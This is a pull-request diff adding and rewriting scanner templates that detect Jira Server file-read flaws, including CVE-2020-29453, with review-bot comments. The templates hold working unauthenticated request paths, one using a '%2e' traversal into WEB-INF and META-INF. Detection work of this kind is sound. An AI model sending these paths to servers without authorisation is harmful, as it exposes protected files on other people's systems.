Merge pull request #2461 from dwisiswant0/add/CVE-2020-29453

Add CVE-2020-29453
patch-1
Sandeep Singh 2021-08-23 14:56:44 +05:30 committed by GitHub
commit 174cd79e1b
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 32 additions and 9 deletions


@ -8,21 +8,18 @@ info:
tags: cve,cve2019,atlassian,jira,lfi tags: cve,cve2019,atlassian,jira,lfi
requests: requests:
- raw: - method: GET
- | path:
GET /s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
Host: {{Hostname}} - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: deflate
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: status - type: status
status: status:
- 200 - 200
- type: word - type: word
words: words:
- <groupId>com.atlassian.jira</groupId> - '<groupId>com.atlassian.jira</groupId>'
part: body part: body
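Review bot: The rewritten request lists two `path` entries under one matcher set, and nothing stops the second probe once the first has matched, so an affected host always receives both requests and can be reported twice. Adding `stop-at-first-match: true` at the request level, next to `matchers-condition: and`, would keep it to one finding per host. The new CVE-2020-29453 file has the same two-path shape and would take the same line. The template's `info` block starts above this hunk, so whether its description still fits the two new paths cannot be checked from here.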


@ -0,0 +1,26 @@
id: CVE-2020-29453
info:
name: Pre-Auth Limited Arbitrary File Read in Jira Server
author: dwisiswant0
severity: medium
description: The CachingResourceDownloadRewriteRule class in Jira Server and Jira Data Center allowed unauthenticated remote attackers to read arbitrary files within WEB-INF and META-INF directories via an incorrect path access check.
reference: https://jira.atlassian.com/browse/JRASERVER-72014
tags: cve,cve2020,atlassian,jira,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/s/{{randstr}}/_/%2e/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml"
- "{{BaseURL}}/s/{{randstr}}/_/%2e/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '<groupId>com.atlassian.jira</groupId>'
part: body
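Review bot: The `info` block names the flawed class but gives no affected or fixed versions and no remediation, so whoever triages a hit has to open the linked ticket to learn what to upgrade to. I would add a line such as `remediation: Upgrade to a fixed Jira release listed in JRASERVER-72014.` and extend `description` with the affected version range taken from that advisory. It would also help to say in the description that the probe only fetches the bundled Maven `pom.xml` files, so a match demonstrates that the path check can be bypassed without reading any sensitive file.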